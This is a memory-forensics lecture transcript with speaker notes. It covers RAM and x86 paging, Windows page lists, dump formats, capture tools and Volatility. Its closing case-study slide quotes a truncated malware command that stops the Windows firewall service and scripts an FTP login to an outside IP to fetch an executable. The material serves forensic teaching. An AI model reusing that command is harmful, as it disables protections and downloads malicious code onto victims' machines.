Memory Forensics

Memory Forensics presentation from one of my lectures. I have tried to explain the functioning of memory in 32-bit architecture, how paging works, how Windows manages its memory pages and how the memory forensics job is done. The forensics part focuses on collecting data and analyzing it.

Speaker Notes

  • Who am I. What has been written in forensics books is "Pull the plug". Things changed post 2005.
  • Check that device drivers run in kernel mode and are therefore inside the protection boundary. A wrong driver may cause a BSoD because it manipulates memory in kernel mode.
  • 32 address pins can specify up to 4 GB of addresses, with 2^32 options.
  • Two-level structure: 1024 x 1024 x 4 KB pages. Every process has:
    – PDE structure (every entry has 20 bits to point to the page table number and 12 bits for page protection and other housekeeping)
    – PTE structure (every entry has 20 bits to point to a 4 KB page, for a total of 1024 x 4 KB pages, and 12 bits for housekeeping)
    – PFN (the Page Frame Number is the 4 KB frame in memory)
    The processor uses 10 bits to find the PDE, 10 bits to find the PTE and 12 bits to identify the location within the 4 KB page.
  • Crash dump: good for analysis; dumped with a frozen state of Windows; debugging tools available from Microsoft. Cons: writes on the hard drive; by default only Windows 2003 dumps full memory (small 64 KB dump, kernel dump and full dump); possibility to force a dump only with a registry tweak, and only after the system is restarted post tweak; full dump available only on systems with up to 2 GB of RAM; contents of the pagefile are overwritten, as the dump first freezes the system, dumps the RAM into the pagefile and then proceeds to
    – Winen: proprietary format from EnCase. Can be converted to other formats, including raw format, with FTK Imager from AccessData.
    – Vmem: a virtual machine can be suspended and a perfect image stored in the .vmem file. Format similar to raw, and the same tools are used to parse it.
    – .Bin: a dump format from Windows.
    – Hibernation file: compressed; file format revealed by Matthieu Suiche for SandMan (now part of Volatility). Can be used as a memory dump. You can use it as an additional dump and compare it with the current dump.
  • Memory is dynamic, so try to stop all other activities while performing the capture. What do you get: RAM, or RAM + pagefile?
  • FireWire port device: extremely fast due to DMA (bypasses the OS). Storm.net.nz project: a software driver that can be installed in BackTrack and other packages and fools the Windows OS into thinking it is an iPod. Not very successful: Blue Screen of Death reported, misses a few parts of the memory. Tribble needs to be installed in the machine prior to the incident. All in all, not much success on the hardware front. Still, for the most part only software is used for memory dumping, and that might in fact rely on DLLs already compromised on the system.
  • Strings and grep: raw searches that don't provide the full context in which the string is used. Memparser won the DFRWS (Digital Forensics Research Workshop) 2005 challenge. Volatility.
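The two-level walk the paging note above describes, as an added example that is not part of the presentation: 10 bits select the PDE, 10 bits the PTE, 12 bits the offset, and each entry carries a 20-bit frame number plus 12 flag bits. It also checks the present and user/supervisor flags, which is how "user mode touching kernel memory" and "RAM or RAM + pagefile" show up in the walk. The function names, flag layout and sample table contents are my assumptions.

```python
# Added example (not from the presentation): 32-bit, non-PAE x86 address
# translation as described in the notes. Table contents are constructed.
PAGE_SIZE = 4096
PRESENT = 0x001   # bit 0: table/page is in RAM
RW = 0x002        # bit 1: writable
USER = 0x004      # bit 2: accessible from user mode (clear = kernel only)

def split_va(va):
    """Split a 32-bit virtual address into (PDE index, PTE index, page offset)."""
    if not 0 <= va < 2 ** 32:
        raise ValueError("virtual address must fit in 32 bits")
    return (va >> 22) & 0x3FF, (va >> 12) & 0x3FF, va & 0xFFF

def make_entry(frame, flags):
    """Build a PDE or PTE: 20-bit frame number in the high bits, 12 flag bits below."""
    return (frame << 12) | (flags & 0xFFF)

def translate(va, page_directory, page_tables, user_mode=False):
    """Walk PDE -> PTE -> frame and return the physical address, or raise on a fault.
    page_directory: 1024 PDEs; page_tables: dict mapping PDE index -> 1024 PTEs."""
    pde_i, pte_i, off = split_va(va)
    pde = page_directory[pde_i]
    if not pde & PRESENT:
        raise LookupError("page table not present: never allocated or paged out")
    if user_mode and not pde & USER:
        raise PermissionError("user mode touched a kernel-only region")
    pte = page_tables[pde_i][pte_i]
    if not pte & PRESENT:
        raise LookupError("page not in RAM: its contents are in the pagefile, if anywhere")
    if user_mode and not pte & USER:
        raise PermissionError("user mode touched a kernel-only page")
    pfn = pte >> 12                       # page frame number: the 4 KB frame in RAM
    return pfn * PAGE_SIZE + off

def build_sample_tables():
    """Constructed sample: a present user page, a paged-out user page and a kernel page."""
    pd = [0] * 1024
    pts = {1: [0] * 1024, 0x200: [0] * 1024}
    # PDE 1 covers VA 0x00400000-0x007FFFFF (user region)
    pd[1] = make_entry(0x050, PRESENT | RW | USER)      # frame holding this page table
    pts[1][1] = make_entry(0x1A3, PRESENT | RW | USER)  # VA 0x00401000 -> PFN 0x1A3
    pts[1][2] = make_entry(0x1A4, RW | USER)            # VA 0x00402000, not present
    # PDE 0x200 covers VA 0x80000000-0x803FFFFF (kernel region, no USER bit)
    pd[0x200] = make_entry(0x051, PRESENT | RW)
    pts[0x200][2] = make_entry(0x010, PRESENT | RW)     # VA 0x80002000 -> PFN 0x010
    return pd, pts
```

A not-present PTE is the case where a forensic RAM-only capture misses the data and only a pagefile-aware tool (the notes mention Fastdump Pro and Memoryze) would recover it.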

Memory Forensics Presentation Transcript

  • Memory Forensics. Shri Boonlia Prince Komal. Don't pull the plug.
    Gmail: boonlia@gmail.com
    Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id boonliasecurity@gmail.com
    Twitter: http://twitter.com/boonlia
  • Live / Dead Memory Forensics
    – What is live memory and what is dead memory: RAM, pagefile, hibernation file, hard drive
    – Live memory forensics
    – Where is the hibernation file?
  • A few basics of RAM
    – A grid of capacitors (DRAM)
    – Bucket with holes
    – Random access
    – Parity bit for error reporting
  • A grid of capacitors
    – Row select: set to high for the related row
    – Column select: set to high for the related column
    – Read/write line: set to high for read and low for write
    – Data inflow or outflow depending upon the R/W state
    – Address bus: carries the address of the memory location
    – Data bus: carries the data in and out through the same wires (read/write bus, or simply data bus)
  • Bucket with holes (DRAM)
    – Capacitors by their very nature get discharged rapidly
    – Any read/write operation adds to these capacitors being discharged
    – This calls for regular refreshing, wherein the entire data is read and written back
    – SRAM uses transistors (2-4) per bit to show the on or off state per bit
  • Memory address space: byte-addressable memory (reads 8 bits at a time)
    – 32-bit processor: 2^32 addresses = 4 GB; 40-bit implementation: 1024 GB
    – 64-bit processor: 2^64 addresses = 17 billion GB; 50-bit implementation: 1024 TB
  • Memory management at a glance (diagram): processor, memory manager, application, DMA?
  • Need for a memory manager
    – Protect operating system and kernel memory space
    – Prevent application violations (accessing other applications' memory)
    – Allocate memory judiciously
    – Allow multiple applications to co-exist
    – Improve memory utilization efficiency
    – Extend the memory capacity via swapping
    – Provide applications a simpler platform to use memory (virtual memory space): you don't have to create two programs for 1 GB and 2 GB RAM machines
    – Manage the shared memory
  • User mode v/s kernel mode
    – Memory protection
    – Location of both the modes in RAM
    – /3GB switch in boot.ini
    – Where the page directory and page table entries are stored
    – What if user mode needs to access something in kernel mode
  • User Mode V/s Kernel Mode Memory
  • Location of page table and page directory (diagram): kernel mode and user mode within the 4 GB space, without PAE and with PAE
  • Overview of virtual memory management on x86 processor. TLB: translation lookaside buffer
  • Memory management in Windows
    – Windows on 32-bit x86 architecture can access up to 4 GB of memory
    – Windows can provide 4 GB of memory space each to multiple processes despite the total memory being 4 GB max
    – This is done by using the x86 feature called paging
    – Every memory page is 4 KB
  • Virtual memory to physical memory
  • The paging process in x86 processor. Image source: technet.microsoft.com
  • A few concepts in Windows memory management: process memory usage counters: virtual size, private byte counter, working set. (Diagram: physical memory (say 1 GB), private bytes, working set, virtual size 2 GB, shared memory.)
  • Page lists in Windows (don't confuse with page table)
    1) Zero page list: pages that carry no data and are ready to be assigned to a process
    2) Standby page list: unmodified pages that are taken away from a process
    3) Free page list: pages not being used by any process and free, but still containing data
    4) Modified page list: modified pages pertaining to a process, taken away from that process
  • Windows memory management at a glance (diagram): process working set, modified page list, standby page list, zero page list, free page list, hard drive; boot pages, saved data, unmodified pages, file data and needed pages, memory no longer needed; exceeding memory use or memory crunch situation in red font
  • Memory management in OS: memory manager
    – Large address space: user programs can reference more memory than physically exists
    – Protection: the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only data
    – Memory mapping: clients can map a file into an area of virtual memory and access the file as memory
    – Fair access to physical memory: the memory manager ensures that processes all have fair access to the machine's memory resources, thus ensuring reasonable system performance
    – Shared memory: the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes
  • What can be found in memory
    – The running processes
    – The running threads
    – Passwords/keys and other information
    – Live registry hives
    – Live chats and login information
    – Malware presence including rootkits
    – Open connections to the net/network
    – Open files and their remnants
    – ... in fact anything that the processor works upon
  • The process of memory forensics
    – Capture the memory
    – Analyze the memory
    – Reconstruction of the memory state
    – Reconstruction of the entire scenario with disk image and memory image in conjunction
  • Various formats
    – Raw dump (linear format) (.img/.dd)
    – Windows crash dump format (.bin): BSoD (written after the system is frozen)
    – Hiberfil.sys format
    – Commercial tool formats: Winen .E01 kind of format; .vmem (VMware); .bin (Hyper-V); Fastdump Pro (hpak)
  • Capturing the memory: tools
    – DD / DCFLDD / DC3DD: dd if=\\.\PhysicalMemory of=f:\memory.img
    – Memdump
    – Win32dd
    – Nigilant32
    – Fastdump (Fastdump Pro dumps page file content too)
    – MDD
    – Winen (EnCase)
    – Memoryze (dumps the pagefile content too)
    – Livekd.exe (from Microsoft)
  • Brief demo on memory acquisition with win32dd
  • Hardware approach
    – FireWire port device (DMA): http://www.storm.net.nz/projects/16
    – PCI device by Brian Carrier and Joe Grand: Tribble device
  • Analysing the memory dump
    – String search with strings.exe
    – Grep search with the grep command
    – DFRWS 2005 (Memparser)
    – 2007: Aaron Walters, Volatility framework
    – Several plugins for Volatility: pdfbook, pdgmail, pdymail, skypeeks
    – Memparser
    – Memoryze and Audit Viewer
  • Volatility Framework: what is Volatility; Volatility plugins; using Volatility on memory dumps; demo with a few options for analysis
  • Cold boot attack
    – Memory doesn't get empty that fast
    – Even after 30 seconds to minutes of system shutdown, the memory contains data
    – This time can be prolonged if the memory is cooled down. The coolant applied instantly reduces the temperature to -50
  • Case study. Shell: C:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 111.67.192.11> cmd.txt&echo chajian>> cmd.txt&echo 123>> cmd.txt&echo binary>>cmd.txt&echo get seo.exe>>…………..
  • You can reach us at:
    Gmail: boonlia@gmail.com
    Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id boonliasecurity@gmail.com
    Twitter: http://twitter.com/#!/boonlia
    boonlia@gmail.com, bhansalireena@gmail.com
    http://nullcon.net nullcon Goa 2010